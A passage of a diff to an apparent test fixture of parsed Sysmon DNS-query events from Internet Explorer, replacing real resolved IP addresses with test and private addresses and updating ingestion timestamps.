Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13049,37 +12910,37 @@ "type": "CNAME" }, { - "data": "54.80.117.178", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.217.22.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.215.15", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.54.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.204.186.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.46.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -13095,18 +12956,13 @@ "jadserve.postrelease.com" ], "ip": [ - "54.80.117.178", - "3.217.22.176", - "35.153.215.15", - "52.207.54.164", - "52.204.186.237", - "52.86.46.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742118400Z", + "ingested": "2021-12-09T13:50:23.457329Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13170,39 +13026,39 @@ "type": "CNAME" }, { - "data": "107.21.43.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.220.86", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.172.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.209.65.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.51.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.193.211.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.47.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.151.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13211,15 +13067,15 @@ } ], "resolved_ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -13236,22 +13092,15 @@ "appnexus-partners.tremorhub.com" ], "ip": [ - "107.21.43.184", - "54.164.220.86", - "52.72.172.174", - "3.209.65.250", - "3.94.51.187", - "34.193.211.130", - "18.214.47.10", - "18.214.151.246", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742124400Z", + "ingested": "2021-12-09T13:50:23.457334800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13319,23 +13168,23 @@ "type": "CNAME" }, { - "data": "107.21.14.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.33.163", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.22.192.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "100.24.96.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13343,18 +13192,18 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -13371,19 +13220,16 @@ "x.dlx.addthis.com" ], "ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742132Z", + "ingested": "2021-12-09T13:50:23.457340500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13451,15 +13297,15 @@ "type": "CNAME" }, { - "data": "18.205.112.71", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.40.146", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13467,7 +13313,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13475,18 +13321,18 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { @@ -13503,19 +13349,18 @@ "dh.serving-sys.com" ], "ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742140700Z", + "ingested": "2021-12-09T13:50:23.457346200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13579,39 +13424,39 @@ "type": "CNAME" }, { - "data": "52.55.160.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.211.67.240", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.173.61.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.179.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.228.105.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.177.113", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.235.70.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13619,7 +13464,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13628,17 +13473,17 @@ } ], "resolved_ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, @@ -13655,24 +13500,17 @@ "match.sharethrough.com" ], "ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742146400Z", + "ingested": "2021-12-09T13:50:23.457352Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13732,11 +13570,11 @@ }, "answers": [ { - "data": "35.241.16.233", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13744,7 +13582,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13752,7 +13590,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13760,7 +13598,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -13768,7 +13606,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -13777,16 +13615,16 @@ } ], "resolved_ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + 